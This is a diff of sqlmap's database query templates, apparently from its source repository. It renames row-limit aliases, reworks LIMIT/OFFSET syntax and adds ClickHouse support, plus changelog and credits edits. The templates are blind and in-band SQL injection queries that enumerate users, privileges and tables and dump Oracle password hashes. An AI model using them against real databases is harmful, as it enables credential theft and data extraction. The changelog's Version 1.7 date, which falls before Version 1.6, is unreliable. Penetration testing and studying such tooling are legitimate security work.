<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
@@ -261,11 +261,11 @@
|
||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS"/>
|
||||
<blind query="SELECT USERNAME FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(USERNAME) FROM SYS.ALL_USERS"/>
|
||||
<blind query="SELECT USERNAME FROM (SELECT USERNAME,ROWNUM AS CAP FROM SYS.ALL_USERS) WHERE CAP=%d" count="SELECT COUNT(USERNAME) FROM SYS.ALL_USERS"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT NAME,PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||
<blind query="SELECT PASSWORD FROM (SELECT PASSWORD,ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(PASSWORD) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
<blind query="SELECT PASSWORD FROM (SELECT PASSWORD,ROWNUM AS CAP FROM SYS.USER$ WHERE NAME='%s') WHERE CAP=%d" count="SELECT COUNT(PASSWORD) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
</passwords>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||
@@ -273,7 +273,7 @@
|
||||
-->
|
||||
<privileges>
|
||||
<inband query="SELECT GRANTEE,PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME,PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(PRIVILEGE) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(PRIVILEGE) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
<blind query="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS CAP FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE CAP=%d" query2="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS CAP FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE CAP=%d" count="SELECT COUNT(PRIVILEGE) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(PRIVILEGE) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
</privileges>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||
@@ -281,20 +281,20 @@
|
||||
-->
|
||||
<roles>
|
||||
<inband query="SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME,GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
<blind query="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS CAP FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE CAP=%d" query2="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS CAP FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE CAP=%d" count="SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
</roles>
|
||||
<statements>
|
||||
<inband query="SELECT SQL_TEXT FROM V$SQL"/>
|
||||
<blind query="SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS LIMIT FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE LIMIT=%d" count="SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'"/>
|
||||
<blind query="SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS CAP FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE CAP=%d" count="SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'"/>
|
||||
</statements>
|
||||
<!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
|
||||
<dbs>
|
||||
<inband query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)"/>
|
||||
<blind query="SELECT OWNER FROM (SELECT OWNER,ROWNUM AS LIMIT FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES"/>
|
||||
<blind query="SELECT OWNER FROM (SELECT OWNER,ROWNUM AS CAP FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE CAP=%d" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES" condition="OWNER"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS CAP FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE CAP=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
|
||||
@@ -302,7 +302,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s ORDER BY ROWNUM"/>
|
||||
<blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS LIMIT FROM %s qq ORDER BY ROWNUM) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS CAP FROM %s qq ORDER BY ROWNUM) WHERE CAP=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
|
||||
<search_db>
|
||||
@@ -357,8 +357,8 @@
|
||||
<blind query="SELECT tbl_name FROM sqlite_master WHERE type='table' LIMIT %d,1" count="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='%s'"/>
|
||||
<blind query="SELECT sql FROM sqlite_master WHERE tbl_name='%s' LIMIT 1" condition=""/>
|
||||
<inband query="SELECT MAX(sql) FROM sqlite_master WHERE type='table' AND tbl_name='%s'"/>
|
||||
<blind query="SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name='%s' LIMIT 1" condition=""/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
@@ -606,7 +606,7 @@
|
||||
<length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
|
||||
<isnull query="COALESCE(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROW_NUMBER() OVER () AS LIMIT %s) AS qq WHERE LIMIT"/>
|
||||
<limit query="ROW_NUMBER() OVER () AS CAP %s) AS qq WHERE CAP"/>
|
||||
<limitregexp query="ROW_NUMBER\(\)\s+OVER\s+\(\)\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
@@ -621,7 +621,7 @@
|
||||
<hex query="HEX(%s)"/>
|
||||
<inference query="SUBSTR((%s),%d,1)>'%c'"/>
|
||||
<!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
|
||||
<banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS qq WHERE LIMIT=1"/>
|
||||
<banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS CAP,versionnumber FROM sysibm.sysversions) AS qq WHERE CAP=1"/>
|
||||
<current_user query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
|
||||
<!-- NOTE: On DB2 we use the current user as default schema (database) -->
|
||||
<current_db query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
|
||||
@@ -631,24 +631,24 @@
|
||||
<is_dba query="(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'"/>
|
||||
<users>
|
||||
<inband query="SELECT grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
<blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
<blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS CAP,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE CAP=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
</users>
|
||||
<!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->
|
||||
<passwords/>
|
||||
<privileges>
|
||||
<inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
|
||||
<blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
|
||||
<blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS CAP,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE CAP=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
|
||||
</privileges>
|
||||
<roles/>
|
||||
<statements/>
|
||||
<!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
|
||||
<dbs>
|
||||
<inband query="SELECT schemaname FROM syscat.schemata"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,schemaname FROM syscat.schemata) AS qq WHERE LIMIT=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS CAP,schemaname FROM syscat.schemata) AS qq WHERE CAP=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT tabschema,tabname FROM sysstat.tables" condition="tabschema"/>
|
||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS CAP,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE CAP=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
|
||||
@@ -656,7 +656,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,%s AS ENTRY_VALUE FROM %s) AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS CAP,%s AS ENTRY_VALUE FROM %s) AS qq WHERE CAP=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT schemaname FROM syscat.schemata WHERE %s" condition="schemaname"/>
|
||||
@@ -679,8 +679,8 @@
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d %d" query2="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring query=" LIMIT "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
@@ -747,10 +747,10 @@
|
||||
<length query="CHAR_LENGTH(%s)"/>
|
||||
<isnull query="IFNULL(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="OFFSET %d LIMIT %d"/>
|
||||
<limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limit query="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring query=" OFFSET "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
@@ -770,7 +770,7 @@
|
||||
<check_udf/>
|
||||
<users>
|
||||
<inband query="SELECT NAME FROM INFORMATION_SCHEMA.USERS"/>
|
||||
<blind query="SELECT NAME FROM INFORMATION_SCHEMA.USERS OFFSET %d LIMIT 1" count="SELECT COUNT(NAME) FROM INFORMATION_SCHEMA.USERS"/>
|
||||
<blind query="SELECT NAME FROM INFORMATION_SCHEMA.USERS LIMIT 1 OFFSET %d" count="SELECT COUNT(NAME) FROM INFORMATION_SCHEMA.USERS"/>
|
||||
</users>
|
||||
<passwords/>
|
||||
<privileges/>
|
||||
@@ -778,11 +778,11 @@
|
||||
<statements/>
|
||||
<dbs>
|
||||
<inband query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA"/>
|
||||
<blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA OFFSET %d LIMIT 1" count="SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA"/>
|
||||
<blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1 OFFSET %d" count="SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES" condition="TABLE_SCHEMA"/>
|
||||
<blind query="SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'"/>
|
||||
<blind query="SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<blind query="SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s' ORDER BY COLUMN_NAME" query2="SELECT TYPE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND TABLE_SCHEMA='%s'" count="SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s'" condition="COLUMN_NAME"/>
|
||||
@@ -875,8 +875,8 @@
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s*OFFSET\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring query=" LIMIT "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
@@ -938,10 +938,10 @@
|
||||
<length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
|
||||
<isnull query="COALESCE(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="{LIMIT %d OFFSET %d}"/>
|
||||
<limitregexp query="{LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)}"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limit query="OFFSET %d ROWS FETCH FIRST %d ROWS ONLY"/>
|
||||
<limitregexp query="OFFSET\s+([\d]+)\s+ROWS\s+FETCH\s+FIRST\s+([\d]+)\s+ROWS\s+ONLY"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limitstring/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
@@ -962,11 +962,11 @@
|
||||
<is_dba query="(SELECT COUNT(*) FROM SYS.SYSUSERS)>=0"/>
|
||||
<dbs>
|
||||
<inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS"/>
|
||||
<blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
|
||||
<blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID" condition="SCHEMANAME"/>
|
||||
<blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' {LIMIT 1 OFFSET %d}" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
|
||||
<blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<!-- NOTE: COLUMNDATATYPE without CAST() causes problems during enumeration -->
|
||||
@@ -975,11 +975,11 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM %s {LIMIT 1 OFFSET %d}" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT %s FROM %s OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.SYSUSERS"/>
|
||||
<blind query="SELECT USERNAME FROM SYS.SYSUSERS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
|
||||
<blind query="SELECT USERNAME FROM SYS.SYSUSERS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
|
||||
</users>
|
||||
<!-- NOTE: No one can view the 'SYSUSERS'.'PASSWORD' column -->
|
||||
<passwords/>
|
||||
@@ -1319,6 +1319,75 @@
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<dbms value="ClickHouse">
|
||||
<cast query="CAST(%s AS String)"/>
|
||||
<length query="length(%s)"/>
|
||||
<isnull query="ifNull(%s, '')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring query=" LIMIT "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--" query2="//"/>
|
||||
<substring query="substring(%s,%d,%d)"/>
|
||||
<concatenate query="%s||%s"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<inference query="substring((%s),%d,1)>'%c'" />
|
||||
<banner query="select version()"/>
|
||||
<current_user query="currentUser()"/>
|
||||
<current_db query="currentDatabase()"/>
|
||||
<hostname query="hostName()"/>
|
||||
<table_comment/>
|
||||
<column_comment/>
|
||||
<is_dba query="(SELECT access_type FROM system.grants WHERE user_name=currentUser())='ALL'"/>
|
||||
<check_udf/>
|
||||
<users>
|
||||
<inband query="SELECT name FROM system.users"/>
|
||||
<blind query="SELECT name FROM system.users LIMIT %d,1" count="SELECT COUNT(name) FROM system.users"/>
|
||||
</users>
|
||||
<passwords/>
|
||||
<privileges>
|
||||
<inband query="SELECT DISTINCT user_name,access_type FROM system.grants" condition="user_name"/>
|
||||
<blind query="SELECT DISTINCT(access_type) FROM system.grants WHERE user_name='%s' ORDER BY access_type LIMIT %d,1" count="SELECT COUNT(DISTINCT(access_type)) FROM system.grants WHERE user_name='%s'"/>
|
||||
</privileges>
|
||||
<roles>
|
||||
<inband query="SELECT DISTINCT user_name,role_name FROM system.role_grants" condition="user_name"/>
|
||||
<blind query="SELECT DISTINCT(role_name) FROM system.role_grants WHERE user_name='%s' ORDER BY role_name LIMIT %d,1" count="SELECT COUNT(DISTINCT(role_name)) FROM system.role_grants WHERE user_name='%s'"/>
|
||||
</roles>
|
||||
<statements/>
|
||||
<dbs>
|
||||
<inband query="SELECT schema_name FROM information_schema.schemata"/>
|
||||
<blind query="SELECT schema_name FROM information_schema.schemata ORDER BY schema_name LIMIT 1 OFFSET %d" count="SELECT COUNT(schema_name) FROM information_schema.schemata"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT table_schema,table_name FROM information_schema.tables" condition="table_schema"/>
|
||||
<blind query="SELECT table_name FROM information_schema.tables WHERE table_schema='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
|
||||
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d,1" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
|
||||
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT %d,1 " count="SELECT COUNT(*) FROM %s.%s"/>
|
||||
</dump_table>
|
||||
<search_table>
|
||||
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
|
||||
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
|
||||
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
|
||||
</search_column>
|
||||
<search_db>
|
||||
<inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
|
||||
<blind query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
|
||||
</search_db>
|
||||
</dbms>
|
||||
|
||||
<dbms value="CrateDB">
|
||||
<cast query="CAST(%s AS TEXT)"/>
|
||||
<length query="CHAR_LENGTH((%s)::text)"/>
|
||||
|
||||
@@ -1,3 +1,13 @@
|
||||
# Version 1.7 (2022-01-02)
|
||||
|
||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
|
||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
|
||||
|
||||
# Version 1.6 (2022-01-03)
|
||||
|
||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
|
||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1)
|
||||
|
||||
# Version 1.5 (2021-01-03)
|
||||
|
||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5)
|
||||
|
||||
@@ -109,6 +109,9 @@ Alessandro Curio, <alessandro.curio(at)gmail.com>
|
||||
Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
|
||||
* for reporting a couple of bugs
|
||||
|
||||
Alexis Danizan, <alexis.danizan(at)synacktiv.com>
|
||||
